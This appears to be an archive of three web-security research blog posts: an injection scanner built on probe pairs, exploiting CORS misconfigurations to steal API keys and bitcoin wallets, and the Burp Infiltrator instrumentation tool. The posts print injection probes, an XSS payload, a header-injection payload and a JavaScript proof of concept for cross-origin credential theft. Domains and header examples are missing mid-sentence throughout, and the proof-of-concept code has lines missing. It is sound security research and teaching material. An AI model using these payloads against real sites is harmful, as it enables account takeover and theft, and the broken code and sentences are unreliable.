' vs '' // single-quoted string (alternative escaping)
" vs \" // double-quoted string
7/0 vs 7/1 // number
${{ vs $}} // interpolation
/**/ vs /*/ // raw code
,99 vs ,1 // order-by
sprintz vs sprintf // function name
We can also string sequences of probe-pairs together to iteratively gather more information on a potential vulnerability. When faced with injection into a string, Backslash Powered Scanner will first identify the type of quote in use, then the concatenation sequence, then identify whether function calls are possible, and finally send a list of language-specific functions to try and identify the backend language. The following screenshot shows the scanner's output when pointed at an application vulnerable to Server-Side JavaScript Injection. Note that the information obtained in each stage is used by the following stage.

The scanner will still report a vulnerability even if it doesn't manage to identify the exact vulnerability: it simply displays all the successful probe-pairs. This means it effectively puts every input into one of three categories: 'boring' (no issue reported), 'vulnerable' (clearly suffers from a specific vulnerability in a known language), and 'interesting' (some probe-pairs were successful, application may be vulnerable to an unknown issue).

Types of Mutation

Applications handle modified inputs in one of two distinct ways. Most inputs vulnerable to server-side injection issues, especially those where the input originates from a free-form text field like a comment, only display a distinct response when you trigger a syntax error server-side:
/post_comment?text=baseComment     200 OK
/post_comment?text=randomtext      200 OK
/post_comment?text=random'text     500 Oops
/post_comment?text=random\'text    200 OK
On other inputs, any deviation from the expected input triggers an error:
/profile?user=bob                  200 OK
/profile?user=randomtext           500 Oops
/profile?user=random'text          500 Oops
/profile?user=random\'text         500 Oops
/profile?user=bo'||'b              200 OK
/profile?user=bo'|z'b              500 Oops
The latter case is significantly harder to handle. To find such vulnerabilities we need to skip the quote-identification stage and guess the concatenation character to find evidence of a vulnerability, making the scanner less efficient. As we can't put random text in probes, we're constrained to a limited number of unique probes which makes reliably fingerprinting responses harder. At the time of writing the scanner doesn't handle such cases, although an early prototype has confirmed it's definitely possible.

This limitation doesn't apply to detecting injections into numeric inputs - given a base number, there is an infinite number of ways to express the same number using simple arithmetic. I've opted for x/1 and x/0, since dividing by zero has the added bonus of throwing an exception in some circumstances.

Recognising Significant Response Differences

The technical challenge at the heart of this technique is recognising when an application's response to two distinct probes is consistently different. A simple string comparison is utterly useless on real world applications, which are notoriously dynamic. Responses are full of dynamic one-time tokens, timestamps, cache-busters, and reflections of the supplied input.

When I approached this challenge three years ago, I used the intuition that responses are composed of static content with dynamic 'fuzzy points'. I therefore tried to use a set of responses to generate a regular expression by stitching together blocks of static content (identified using the longest-common-subsequence algorithm) with wildcards. For reasons of brevity, I'll only mention a small sample of the crippling issues with this approach. For a start, it's computationally intensive - the longest common subsequence implementation I used was O(n2); the time it took to process a response was proportional to the length of the response squared. The regular expressions were often so complex that scanning the wrong application caused a denial of service on the scanner itself. It also fails to account for applications giving drastically different responses which are difficult to regex together, and shuffling the order of response content. Even timestamps in responses raise difficulties, because parts of them by definition only change every 10, 60, or 100 seconds. Finally, it's extremely difficult to debug, as identifying why a particular response doesn't match a 500-line regular expression can be tricky. Each of these problems may sound solvable, but my attempting to solve them is why this code wasn't released two years ago.

Instead, Backslash Powered Scanner uses the simpler approach of calculating a number of attributes for each response, and noting which ones are consistent across responses. Attributes include the status code, content type, HTML structure, line count, word count, input reflection count, and the frequency of various keywords.

The selection and delivery of probes is also crucial in minimising diffing problems. To differentiate between response differences due to non-determinism and differences caused by our probes, it's necessary to send each pair of probes multiple times. A scanner that simply alternates between two payloads will fail and report false positives when confronted with an application that happens to alternate between two distinct responses, so it's important to mix up the probe order. Some particularly pernicious applications reflect deterministic transformations of user input, or even use user input to seed the choice of testimonial quote. To remedy this, rather than probe-pairs we use pairs of sets of slightly different probes. Finally, caches can make 'random' content appear permanent, but this can easily be fixed using a cache buster.

Hunting Findings

Scanning Distributed Systems

Seeking to evaluate the scanner on real word systems and having a relatively limited supply of pentests, I decided to run it on every website within scope of a bug bounty program that doesn't disallow automated testing. This is a couple of thousand domains by my calculation. To display courtesy (and avoid being IP-banned), I needed to throttle the scanner to ensure it only sent one request per three seconds to each application. Burp Suite only supports per-thread throttling, so I've coded and released an extension which will implement a per-host throttle. This extension also enables interleaving scan items on different hosts to ensure the overall scanner speed is still decent, and generating host-interleaved lists of unfetched pages for efficient throttled crawling. It also makes some other minor optimisations to improve scan speed without significantly reducing coverage, such as only scanning unpromising parameters like cookies once per host per response type.

Sample Results

To illustrate the types of findings the scanner provides and how to interpret them, I'll take a look at selected results from this experiment. It may help to think of Backslash Powered Scanner as less like a vulnerability scanner, and more like an eager assistant with limited technical understanding.

MySQL Injection

The following result came from a site that was vulnerable to SQL injection via the User-Agent header:

Basic fuzz  (\z`z'z"\ vs \`z\'z\"\\)
    Content: 5357 vs 5263

String - apostrophe  (\zz'z vs z\\\'z)
    Content: 5357 vs 5263

Concatenation: '||  (z||'z(z'z vs z(z'||'z)
    Content: 5357 vs 5263

Basic function injection  ('||abf(1)||' vs '||abs(1)||')
    Content: 5281 vs 5263

MySQL injection  ('||power(unix_timestanp(),0)||' vs '||power(unix_timestamp(),0)||')
    Content: 5281 vs 5263
The scanner identified that the input was interesting, and correctly identified the exact vulnerability by injecting a function that only exists in MySQL. The 'Content: 5357 vs 5263' line is indicating the attribute the scanner used to distinguish the two results. In this case, the word count on the two responses is different. When this amount of evidence is displayed, the issue is extremely unlikely to be a false positive.

Filtered Code Injection

The following finding comes from a pentest of a site that had already been tested numerous times, and clearly shows the power of this scanner:

String - doublequoted (\zz" vs \")
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0

Concatenation: ". (z."z(z"z vs z(z"."z)
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0

Interpolation - dollar (z${{z vs }}$z)
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0
This was vulnerable to PHP code injection, but parenthesis were being filtered out by the application - it's the second of the three blind spots of classic scanners mentioned earlier. Because parenthesis are being filtered, the scanner has failed to inject a function, but we can execute arbitrary shell commands manually with a little effort.

I think the reason this vulnerability was missed by previous pentesters is that the injection was in the file path, which perhaps isn't somewhere a time-pressured tester would bother to manually check for code injection vulnerabilities. Why the application was calling eval() on the path remains a mystery. It's the kind of behaviour you expect from an internet of things device, not a household name website.

Old vulnerability

The following finding shows the current status of the input on that was previously vulnerable to PHP code injection (blind spot #3). We can clearly see that the application responds differently to any input containing the { character.

Note that the responses demonstrate a behaviour opposite to what a naive fuzzer might expect - the string intended to break the application ${{z causes a 200 OK response, whereas the harmless string causes a 500 Internal Server Error. Even though the search function is broken, the scanner has identified a clue of a vulnerability that used to be. Since the scanner is so efficient, it's perfectly plausible to try the PHP array-bypass attack on every input.

Regular Expression Injection

The scanner reported quite a few regex injection vulnerabilities, using both the input-transformation and diffing techniques. This is typically a low severity issue - it can be used to interfere with application logic and perhaps cause a denial of service (ReDoS) but little else. An exception is on servers running PHP<5.4.7, where regex injection can be escalated to arbitrary code execution by using a null byte to specify the 'e' flag. This technique was recently used to exploit phpMyAdmin, and I've verified that the scanner finds it. Regex injection is typically reported with the following fingerprint:
Diffing scanner:
Backslash  (\ vs \\)

Transformation Scanner:
\0 => Truncated
\1 => Truncated
\$ => $
$ => $
Backreferences like \0 offer a simple way to recognise regex injection. Applications may treat \99 differently from \100, and expand lower groups like \0 or \1 to other strings:

GET /folder?q=foo\0bar HTTP/1.1

HTTP/1.1 301 Moved Permanently

Escaping Flaws

The scanner noticed a cute but useless flaw in the way a popular web framework escapes values to be put into cookies:
foo"z: Set-Cookie: bci=1234; domain="foo\"z";
foo\: Set-Cookie: bci=1234; domain="foo\";
foo"z\: 500 Internal Server Error
This framework proved so popular that I added a followup probe to automatically classify this issue and prevent anyone wasting time on it:
Basic fuzz  (\z`z'z"\ vs \`z\'z\"\\)
    exception: 1 vs 0
Doublequote plus slash  (z"z\ vs z\z)
    exception: 1 vs 0

Semantic False Positives

The function injection detection code raised a single false positive:

Function hijacking (sprintg vs sprintf)
<div: 13 vs 14
The root problem is evident from the URL: The q input is being used to search a large codebase, where 'sprintf' is naturally a far more common term than 'sprintg'. Search functions are frequently ranked as interesting by the scanner, particularly those that support advanced syntax as they can appear deceptively similar to code injection vulnerabilities.

Web Application Firewall

Web Application Firewalls provide another source of 'interesting' behaviour. The scanner noticed that inline comments were being ignored on an otherwise value-sensitive input:

0/**z'*/ vs 0/*/*/z'*/
Manual investigation revealed that even HTML comments were being ignored... and also iframes.
0<!--foo--> vs 0<!--foo->
0<iframe> vs 0<zframe>
It looks like a Web Application Firewall (WAF) is rewriting input to remove comments and potentially harmful HTML. This is good to know - input rewriting effectively disables browsers' XSS filters. As ever, we can automate the HTML-comment followup to prevent this WAF from being a reoccurring distraction.

SOLR JSON Injection

The scanner flagged some interesting behaviour exhibited by a search function:

Basic fuzz (\z`z'z"\ vs \`z\'z\"\\)
    Content: 1578 vs 1575
Backslash (\ vs \\)
    Content: 1576 vs 1575
String - doublequoted (\zz" vs \")
    Content: 1578 vs 1575
Manual testing revealed that the application was decoding unicode-escaped input too - searching for \u006d\u0069\u0072\u0072\u006f\u0072 returned the same results as searching for 'mirror'. It appeared that user input was being embedded into a JSON string without escaping, enabling us to break out of the search string and alter the query structure.

Lessons Learned

These examples clearly show that the probe iteration process is crucial - it means that at a glance, we can distinguish a clearly critical issue from something that may take untold hours of investigation to classify. At present, search functions, WAFs and regex injections are a persistent source of promising looking behaviour that doesn't normally lead anywhere useful. Due to the flexibility of the probe-pair approach, almost every dud lead we encounter can be automatically classified in future with a followup probe.

We've also seen that the scanner can identify information that is useful even though it doesn't directly cause a vulnerability.

Many of these vulnerabilities were found on applications protected by WAFs - it appears that the simplicity of the payloads used makes them slip past WAFs unnoticed. However, I found that per-host rate limiting won't keep you off the radar of certain distributed firewall solutions that share IP-reputation scores; I managed to get the office IP banned from without sending a single packet to it.

Further Research

The techniques and code used in the scanner can be adapted to detect far more than server-side injection vulnerabilities. We've already seen that followup probe pairs can be used to identify both WAFs and search functions.

Enumerable Input Detection

Applications frequently suffer from access control bypasses where attackers can perform unauthorised operations simply by incrementing a number, for example on a URL like /edit_profile?id=734

We can automate detection of inputs where it's possible to obtain additional data by incrementing a number. First, confirm that id=734, id=735, and id=736 return distinct responses. Fetching three distinct responses shows that the id input is being used, and that we're getting more than an 'invalid id' message. However, the application might just be performing a fixed transformation on the input or using it to seed an RNG. By requesting id=100734 and id=100735, and confirming they match, we can verify that we're retrieving data from a finite set.

Cold-start Bruteforce Attacks

Pentesters are often in a situation where they want to bruteforce a value, but don't know what the success condition looks like. I made the earliest version of this scanner on a pentest where an ill-prepared client had failed to provide me with a single valid username, let alone a password. In order to stand a chance of guessing a valid password I had to bruteforce a username first, but the response to a valid username might be only subtly different, and I couldn't manually review thousands of login attempts. Using the response attribute diffing technique, this attack can be reliably automated. This approach can even bypass anti-bruteforce measures; when testing this tool I found that gave a slightly distinct response to login attempts with a valid password, even when the account was locked due to excessive login attempts.

Bruteforcing file and folder names on servers that don't provide helpful 404 codes raises a similar challenge. With a few modifications, we could also use this technique to bruteforce hidden parameters to find mass-assignment vulnerabilities, and perhaps even bruteforce valid objects for deserialization exploits.


Classic scanners have several serious blind spots when it comes to identifying server-side injection vulnerabilities. By modelling the approach of an experienced manual tester, I have created a scanner that avoids these blind spots and is extremely efficient. It currently classifies inputs as either boring, interesting, or vulnerable to a specific issue. Issues classified as interesting require manual investigation by security experts, so at present this tool is primarily useful only to security experts. However, the scanner can be adapted to classify individual issues, so over time the proportion of issues classified as 'interesting' instead of 'vulnerable' should drop, making it suitable for a broader range of users.

Friday, October 14, 2016

Exploiting CORS Misconfigurations for Bitcoins and Bounties

(or CORS Misconfiguration Misconceptions)

This is a greatly condensed version of my AppSec USA talk. If you have time (or struggle to understand anything) I highly recommend checking out the slides and watching the video.

Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It’s widely understood that certain CORS configurations are dangerous, but some associated subtleties and implications are easily misunderstood. In this post I’ll show how to critically examine CORS configurations from a hacker’s perspective, and steal bitcoins.

CORS for Hackers

Websites enable CORS by sending the following HTTP response header:
This permits the listed origin (domain) to make visitors’ web browsers issue cross-domain requests to the server and read the responses - something the Same Origin Policy would normally prevent. By default this request will be issued without cookies or other credentials, so it can’t be used to steal sensitive user-specific information like CSRF tokens. The server can enable credential transmission using the following header:
Access-Control-Allow-Credentials: true
This creates a trust relationship - an XSS vulnerability on is bad news for this site.

Hidden in plain sight

Trusting a single origin is easy. What if you need to trust multiple origins? The specification suggests that you can simply specify a space-separated list of origins, eg:
However, no browsers actually support this.

You might also want to use a wildcard to trust all your subdomains, by specifying something like:
Access-Control-Allow-Origin: *
But that won't work either. The only wildcard origin is '*'

There's a hidden safety catch in CORS, too. If you try to disable the SOP entirely and expose your site to everyone by using the following terrifying looking header combination:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Then you’ll get the following error in your browser console:
“Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true.”
This exception is mentioned in the specification, and also backed up by Mozilla’s documentation:
"when responding to a credentialed request,  server must specify a domain, and cannot use wild carding"
In other words, using a wildcard effectively disables the Allow-Credentials header.

As a result of these limitations, many servers programmatically generate the Access-Control-Allow-Origin header based on the user-supplied Origin value. If you see a HTTP response with any Access-Control-* headers but no origins declared, this is a strong indication that the server will generate the header based on your input. Other servers will only send CORS headers if they receive a request containing the Origin header, making associated vulnerabilities extremely easy to miss.

Credentials and bitcoins

So, plenty of websites derive allowed origins from user input. What could possibly go wrong? I decided to assess a few bug bounty sites and find out. Note that as these sites all have bug bounty programs, every vulnerability I mention has been missed by numerous other bounty hunters.

I quickly replicated Evan Johnson's finding that many applications make no attempt to validate the origin before reflecting it, and identified a vulnerable bitcoin exchange (which sadly prefers to remain unnamed):
GET /api/requestApiKey HTTP/1.1
Host: <redacted>
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true

{"[private API key]"}
Making a proof of concept exploit to steal users' private API keys was trivial:
var req = new XMLHttpRequest();
req.onload = reqListener;'get','https://btc-exchange/api/requestApiKey',true);
req.withCredentials = true;

function reqListener() {
After retrieving a user's API key, I could disable account notifications, enable 2FA to lock them out, and transfer their bitcoins to an arbitrary address. That’s pretty severe for a header misconfiguration. Resisting the urge to take the bitcoins and run, I reported this to their bug bounty program and it was patched within an astounding 20 minutes.

Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted. For example, a site which I'll call trusts all origins that ended in, including Even worse, a second bitcoin exchange (let's call it trusted all Origins that started with, including Unfortunately the site unexpectedly and permanently ceased operations before I could build a working proof of concept. I won't speculate as to why.

The null origin

If you were paying close attention earlier, you might have wondered what the 'null' origin is for. The specification mentions it being triggered by redirects, and a few stackoverflow posts show that local HTML files also get it. Perhaps due to the association with local files, I found that quite a few websites whitelist it, including Google's PDF reader:
GET /reader?url=zxcvbn.pdf
Origin: null

HTTP/1.1 200 OK
Acess-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
and a certain third bitcoin exchange. This is great for attackers, because any website can easily obtain the null origin using a sandboxed iframe:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>’></iframe>

Using a sequence of CORS requests, it was possible to steal encrypted backups of users' wallets, enabling an extremely fast offline brute-force attack against their wallet password. If anyone's password wasn't quite up to scratch, I'd get their bitcoins.

This particular misconfiguration is surprisingly common - if you look for it, you'll find it. The choice of the keyword 'null' is itself a tad unfortunate, because failing to configure an origin whitelist in certain applications may result in...
Access-Control-Allow-Origin: null

Breaking HTTPS

During this research I found two other prevalent whitelist implementation flaws, which often occur at the same time. The first is blindly whitelisting all subdomains - even non-existent ones. Many companies have subdomains pointing to applications hosted by third parties with awful security practises. Trusting that these don't have a single XSS vulnerability and never will in future is a really bad idea.

The second common error is failing to restrict the origin protocol. If a website is accessed over HTTPS but will happily accept CORS interactions from http://wherever, someone performing an active man-in-the-middle (MITM) attack can pretty much bypass its use of HTTPS entirely. Strict Transport Security and secure cookies will do little to prevent this attack. Check out the presentation recording when it lands for a demo of this attack.

Abusing CORS Without Credentials

We've seen that with credentials enabled, CORS can be highly dangerous. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Even token fixation attacks are infeasible, because any new cookies set are ignored by the browser.

One notable exception is when the victim's network location functions as a kind of authentication. You can use a victim’s browser as a proxy to bypass IP-based authentication and access intranet applications. In terms of impact this is similar to DNS rebinding, but much less fiddly to exploit.

Vary: Origin 

If you take a look at the 'Implementation Considerations' section in the CORS specification, you'll notice that it instructs developers specify the 'Vary: Origin' HTTP header whenever Access-Control-Allow-Origin headers are dynamically generated.

That might sound pretty simple, but immense numbers of people forget, including the W3C itself, leading to this fantastic quote:
"I must say, it doesn't make me very confident that soon more sites will be supporting CORS if not even the W3C manages to configure its server right" - Reto Gmür
What happens if we ignore this advice? Mostly things just break. However, in the right circumstances it can enable some quite serious attacks.

Client-Side Cache Poisoning

You may have occasionally encountered a page with reflected XSS in a custom HTTP header. Say a web page reflects the contents of a custom header without encoding:
GET / HTTP/1.1
X-User-id: <svg/onload=alert(1)>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-User-id
Content-Type: text/html
Invalid user: <svg/onload=alert(1)>
Without CORS, this is impossible to exploit as there’s no way to make someone’s browser send the X-User-id header cross-domain. With CORS, we can make them send this request. By itself, that's useless since the response containing our injected JavaScript won't be rendered. However, if Vary: Origin hasn't been specified the response may be stored in the browser's cache and displayed directly when the browser navigates to the associated URL. I've made a fiddle to attempt this attack on a URL of your choice. Since this attack uses client-side caching, it's actually quite reliable.

Server-Side Cache Poisoning

If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a stored XSS vulnerability.

If an application reflects the Origin header without even checking it for illegal characters like \r, we effectively have a HTTP header injection vulnerability against IE/Edge users as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator:
GET / HTTP/1.1
Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
Internet Explorer sees the response as:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people. The payload I've used will change the page's character set to UTF-7, which is notoriously useful for creating XSS vulnerabilities.

Good Intentions and Bad Results

I was initially surprised by the number of sites that dynamically generate Access-Control-Allow-Origin headers. The root cause of this behavior may be two key limitations of CORS - multiple origins in a single header aren't supported, and neither are wildcarded subdomains. This leaves many developers with no choice but to do dynamic header generation, risking all the implementation flaws discussed above. I think that if the specification authors and browsers decided to allow origin lists and partial wildcards, dynamic header generation and associated vulnerabilities would plummet.

Another potential improvement for browsers is to apply the wildcard+credentials exception to the null origin. At present, the null origin is significantly more dangerous than the wildcard origin, something I imagine a lot of people find surprising.

Something else browsers could try is blocking what I've coined "reverse mixed-content" - HTTP sites using CORS to steal data from HTTPS sites. I have no idea what scale of breakage this would cause, though.

Simplicity and security may go hand in hand but by neglecting to support multiple origin declarations, web browsers have just pushed the complexity onto developers with harmful results. I think the main take-away from this is that secure specification design and implementation is fiendishly difficult.


CORS is a powerful technology best used with care, and severe exploits don't always require specialist skills and convoluted exploit chains - often a basic understanding of a specification and a little attentiveness is all you need. In case you're running low on coffee, as of today Burp Suite's scanner will identify and report all the flaws discussed here.

- @albinowax

Tuesday, July 26, 2016

Introducing Burp Infiltrator

The latest release of Burp Suite introduces a new tool, called Burp Infiltrator.

Burp Infiltrator is a tool for instrumenting target web applications in order to facilitate testing using Burp Scanner. Burp Infiltrator modifies the target application so that Burp can detect cases where its input is passed to potentially unsafe APIs on the server side. In industry jargon, this capability is known as IAST (interactive application security testing).

Burp Infiltrator currently supports applications written in Java or other JVM-based languages such as Groovy. Java versions from 4 and upwards are supported. In future, Burp Infiltrator will support other platforms such as .NET.

How Burp Infiltrator works

  1. The Burp user exports the Burp Infiltrator installer from Burp, via the "Burp" menu.
  2. The application developer or administrator installs Burp Infiltrator by running it on the machine containing the application bytecode.
  3. Burp Infiltrator patches the application bytecode to inject instrumentation hooks at locations where potentially unsafe APIs are called.
  4. The application is launched in the normal way, running the patched bytecode.
  5. The Burp user performs a scan of the application in the normal way.
  6. When the application calls a potentially unsafe API, the instrumentation hook inspects the relevant parameters to the API. Any Burp payloads containing Burp Collaborator domains are fingerprinted based on their unique structure.
  7. The instrumentation hook mutates the detected Burp Collaborator domain to incorporate an identifier of the API that was called.
  8. The instrumentation hook performs a DNS lookup of the mutated Burp Collaborator domain.
  9. Optionally, based on configuration options, the instrumentation hook makes an HTTP/S request to the mutated Burp Collaborator domain, including the full value of the relevant parameter and the application call stack.
  10. Burp polls the Collaborator server in the normal way to retrieve details of any Collaborator interactions that have occurred as a result of its scan payloads. Details of any interactions that have been performed by the Burp Infiltrator instrumentation are returned to Burp.
  11. Burp reports to the user that the relevant item of input is being passed by the application to a potentially unsafe API, and generates an informational scan issue of the relevant vulnerability type. If other evidence was found for the same issue (based on in-band behavior or other Collaborator interactions) then this evidence is aggregated into a single issue.

Issues reported by Burp Infiltrator

Burp Infiltrator allows Burp Scanner to report usage of potentially dangerous server-side APIs that may constitute a security vulnerability. It also allows Burp to correlate the external entry point for a vulnerability (for example a particular URL and parameter) with the back-end code where the vulnerability occurs.

In the following example, Burp Scanner has identified an XML injection vulnerability based on Burp's existing scanning techniques, and also reports the unsafe API call that leads to the vulnerability within the server-side application:

Burp Infiltrator enables Burp to report:
  • The potentially unsafe API that was called.
  • The full value of the relevant parameter to that API.
  • The application call stack when the API was invoked.
This information can be hugely beneficial for numerous purposes:
  • It provides additional evidence to corroborate a putative vulnerability reported using conventional dynamic scanning techniques.
  • It allows developers to see exactly where in their code a vulnerability occurs, including the names of code files and line numbers.
  • It allows security testers to see exactly what data is passed to a potentially unsafe API as a result of submitted input, facilitating manual exploitation of many vulnerabilities, such as SQL injection into complex nested queries.

Important considerations

Please take careful note of the following points before using Burp Infiltrator:
  • You should read all of the documentation about Burp Infiltrator before using it or inducing anyone else to use it. You should only use Burp Infiltrator in full understanding of its nature and the risks inherent in its utilization.
  • You can use a private Burp Collaborator server with Burp Infiltrator, provided the Collaborator server is configured using a domain name, not via an IP address.
  • You can install Burp Infiltrator within a target application non-interactively, for use in CI pipelines and other automated use cases.
  • During installation of Burp Infiltrator, you can configure whether full parameter values and call stacks should be reported, and various other configuration options.
For more details, including step-by-step instructions, please refer to the Burp Infiltrator documentation.